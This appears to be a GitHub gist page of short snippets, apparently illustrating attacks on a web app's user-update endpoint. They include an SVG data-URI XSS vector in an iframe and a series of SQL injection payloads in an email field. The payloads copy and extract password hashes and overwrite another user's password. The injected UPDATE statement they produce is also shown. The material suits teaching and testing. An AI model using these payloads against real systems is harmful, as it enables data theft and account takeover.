David Gilbertson davidgilbertson

  • Sydney, Australia
View iframe-with-xss
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6Y29uc29sZS5sb2coJ1NVQ0NFU1M6IFNWRyBYU1MgdmlhIGRhdGEgVVJJJykiIC8+Cjwvc3ZnPg=="></iframe>
View 10.js
{
  // ...
  body: `email=no', surname = salt WHERE username = 'myemail@email.com'; #`
}
View 9.js
{
  // ...
  body: `email=no', password = '00fcdde26dd77af7858a52e3913e6f3330a32b3121a61bce915cc6145fc44453' WHERE username = 'user-two@email.com'; #`
}
View 8.js
{
  // ...
  body: `email=no', surname = SUBSTRING(password, 30, 1000) WHERE username = 'me@email.com'; #`
}
View 7.js
{
  // ...
  body: `email=no', password = '00fcdde26dd77af7858a52e3913e6f3330a32b31' WHERE username = 'user-two@email.com'; #`
}
View 6.js
{
  // ...
  body: `email=no', surname = 'WOOT!!' WHERE username = 'user-two@email.com'; #`
}
View 5.js
{
  // ...
  body: `email=no', surname = password WHERE username = 'me@email.com'; #`
}
View 4.js
{
  // ...
  body: `email=no', lastName='testing`
}
View 3.js
fetch('https://blah.com/api/users', {
  credentials: 'include',
  headers: {
    authorization: 'Bearer blah',
    'content-type': 'application/x-www-form-urlencoded',
    'sec-fetch-mode': 'cors',
    'x-csrf-token': 'blah',
  },
  referrer: 'https://blah.com/blah',
  referrerPolicy: 'no-referrer-when-downgrade',
View 4.sql
UPDATE users SET email = 'no', surname = password WHERE username = 'me@email.com'; # WHERE id = '1234'